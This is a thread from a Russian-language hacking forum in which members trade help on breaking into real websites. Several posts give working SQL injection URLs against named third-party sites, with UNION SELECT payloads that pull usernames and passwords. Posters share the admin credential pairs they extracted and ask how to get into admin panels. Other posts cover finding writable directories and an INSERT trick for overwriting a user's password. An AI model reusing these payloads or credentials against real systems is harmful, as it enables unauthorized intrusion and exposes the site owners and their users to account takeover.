Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    может прав нету, не?
    ищи папку, где будут права на запись, либо попробуй другим способом
     
  2. apekoff

    apekoff New Member

    Joined:
    12 Mar 2009
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    получается путь пральный !
    видимо нет прав на запись ...или я не даже не знаю .. идеи ?
    Да вы батенька - хам
    Лайт можно тебя в ПМ, а то джокстер говорит что я флудер , а сам тупо 2 мессаги захирячил ниочем
     
    #10042 apekoff, 13 Nov 2009
    Last edited: 13 Nov 2009
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Да
    Закончить флудить и как уже сказали искать папку на запись
     
    1 person likes this.
  4. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    apekoff, на тебе диру под запись:
    гугл всемогущий...или брюс. Похрен впрочем. Лейся.
     
    1 person likes this.
  5. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    парни, вот уже наверное за 2 дня десятую скули раскрутил,нашел админку,но пассворд не подходит, вот пример:
    http://www.kamal.dk/fokusligenu.php?id=-227+UNION+SELECT+1,2,3,concat(username,0x20,userpassword),5,6,7,8,9,10,11,12+from+users--
    http://www.kamal.dk/admin

    но опять ничего не подошло, посмотрите плиз)
     
  6. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    Стоит basic авторизация (т.е. возможно одна пара логин/пароль вписанны в php файл для авторизации через basic (имхо многие так админы делают))

    Возможно таблица юзеров от чего то другого
     
  7. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    wolmer, я смотрю умные админы пошли) 10 сайтов, 10 разных стран...странно)
     
  8. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    На этом сайте есть таблица user

    http://www.pcci.org.za/default.asp?id=946

    Microsoft JET Database Engine error '80040e14'

    Syntax error in string in query expression 'id = 946''.

    /default.asp, line 128


    http://www.pcci.org.za/default.asp?id=946+order+by+2
    http://www.pcci.org.za/default.asp?id=946+union+select+1,2

    http://www.pcci.org.za/default.asp?id=-946+union+select+*+from+msysobjects+in+'.'






    Microsoft JET Database Engine error '80004005'

    The Microsoft Jet database engine cannot open the file 'c:\windows\system32\inetsrv'. It is already opened exclusively by another user, or you need permission to view its data.

    /default.asp, line 128




    Но вывести нечего не удаеться.

    Поскажите, как правилбно составить запрос.
     
  9. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    FlaktW,

    http://www.pcci.org.za/default.asp?id=-1+union+select+null,name+from+msysobjects+where+MSysObjects.Type=6

    id=-1+union+select+username,password+from+ADMINISTRATORS
     
    #10049 ElteRUS, 13 Nov 2009
    Last edited: 13 Nov 2009
    1 person likes this.
  10. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    ElteRUS, смотри, www.pcci.org.za/admin - админка
    есть три пары:
    admin;admin
    admi;admin
    manager;manager
    правильно?
    Но опять же, в админку не попасть)
     
    #10050 jecka3000, 13 Nov 2009
    Last edited: 13 Nov 2009
  11. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12




    Thanks, все получилось.
     
  12. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    http://login.main.cne.gov.pr/login.php
    есть следующие пары:
    admin:Dyn@mic
    webmaster:2624

    Но опять же ни один не подошел! Мне кажется, что я что то не так делаю,т.к. не может не подходить пароли уже к больше чем к 10 сайтам!
     
  13. fng

    fng New Member

    Joined:
    12 Nov 2009
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Возник такой вопрос. Можно с помощью SQL injection внедрить запросы типа INSERT и DELETE? Для MySQL.
     
    #10053 fng, 13 Nov 2009
    Last edited: 13 Nov 2009
  14. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Ну если есть инъекция в INSERT/DELETE запросе - то можно.
     
  15. fng

    fng New Member

    Joined:
    12 Nov 2009
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    а если в SELECT-е -- нет?
     
  16. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    Пример внедрения в студию
     
  17. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Скуль в имени таблицы:

     
  18. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    А если mysql-inj будет в параметрах? (так то если mysql-inj в имени таблицы то это легко крутить)(именно интересует выход за таблицу и запись в другую какую либо таблицу (но скорее всего это не возможно :) ))
     
    #10058 wolmer, 13 Nov 2009
    Last edited: 13 Nov 2009
  19. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    ты забыл добавить одно НО, если у пользователя из под которого работает скрипт ЕСТЬ ПРАВА НА ВЫПОЛНЕНИЕ операторов INSERT/UPDATE/DELETE.

    Хотя да, я невнимательно прочитал твоё сообщение. Извиняюсь.
     
  20. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    например:
    INSERT INTO users
    SET id ={inj}

    INSERT INTO users
    SET id =1 ON duplicate KEY UPDATE pass = '12345'

    поле id должно быть первичным ключем или просто уникальным
     
    1 person likes this.
Thread Status:
Not open for further replies.